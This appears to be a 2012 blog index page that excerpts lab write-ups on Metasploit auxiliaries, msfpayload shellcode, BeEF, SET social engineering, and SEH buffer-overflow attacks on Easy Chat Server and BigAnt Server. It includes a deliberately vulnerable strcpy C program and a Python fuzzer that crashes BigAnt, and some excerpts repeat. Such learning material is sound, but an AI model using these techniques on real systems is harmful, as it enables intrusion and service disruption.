In this session, i will try to Combine the technique between Browser Exploitation and File Exploitation. First step that i do, i make a page of html. Inside that script html, i insert the link of js file. To copy the link of js file, i run the beef-Ng first.
Tuesday, February 28, 2012
Social Engineering and SET (Social Engineering Toolkit)
Social engineering
in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information. While it is similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victims.
How To Use An Auxiliary On Metasploit
This time, I will try to make an
example to use one of an auxiliary on metasploit. On the metasploit, there are so many auxiliary that we can use.
I will try to use an auxiliar/scanner/ftp/ftp_version
First, i open the msfconsole.
Monday, February 27, 2012
MsfPayload And MsfEncode
This time, i try to give the example of use msfpayload and msfencode.
MsfPayload is code that we want the system to execute and that is to be selected and delivered by the Framework. The msfpayload component of Metasploit allows you to generate shellcode. Msfpayload is located in directory /opt/framework/msf3/ . If you want to see the list of the payload just type ./msfpayload -l
MsfPayload is code that we want the system to execute and that is to be selected and delivered by the Framework. The msfpayload component of Metasploit allows you to generate shellcode. Msfpayload is located in directory /opt/framework/msf3/ . If you want to see the list of the payload just type ./msfpayload -l
Saturday, February 25, 2012
Linux Exploitation
This time, i will try to share about Linux exploitation. In this session, i will exploit Backtrack Linux. First, we make the script by using C language.
The script was like this
//I am a vulnerable thing.
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[500];
strcpy(buffer, argv[1]); //Vulnerable function
return 0;
}
Wednesday, February 22, 2012
Exploit Easy Chat Server With Buffer Overflow SEH Method
This time, i'll try to exploit Easy Chat Server Application.
Because this application was connect to the Network, so i try to sniff it with Wireshark Tools in Backtrack and my Virtual Windows. Next, i try to open this chat from browser in my Backtrack.
I use admin admin in the field Name and Password. I see that user and Password from the easy chat server application.
Well then, i try to entry Let's Talk About Love room.
Saturday, February 18, 2012
Exploit BigAnt Server Application Buffer Overflow SEH
This time i try to Exploit BigAnt Server Application With Buffer Overflow SEH method. BigAnt is a server messaging application.
Oke first step, i make a fuzzer script by using a python language programming like this.
#!/usr/bin/python
import socket
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target_address="192.168.56.101"
target_port=6660
buffer="USV "+"\x41"*2500+"\r\n\r\n"
sock.connect((target_address,target_port))
sock.send(buffer)
print("berhasil..berhasil..berhasil..horee")
sock.close()
Next i open BigAnt Server application with Ollydbg and run the fuzzer script.
Oke first step, i make a fuzzer script by using a python language programming like this.
#!/usr/bin/python
import socket
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target_address="192.168.56.101"
target_port=6660
buffer="USV "+"\x41"*2500+"\r\n\r\n"
sock.connect((target_address,target_port))
sock.send(buffer)
print("berhasil..berhasil..berhasil..horee")
sock.close()
Next i open BigAnt Server application with Ollydbg and run the fuzzer script.
Subscribe to:
Posts (Atom)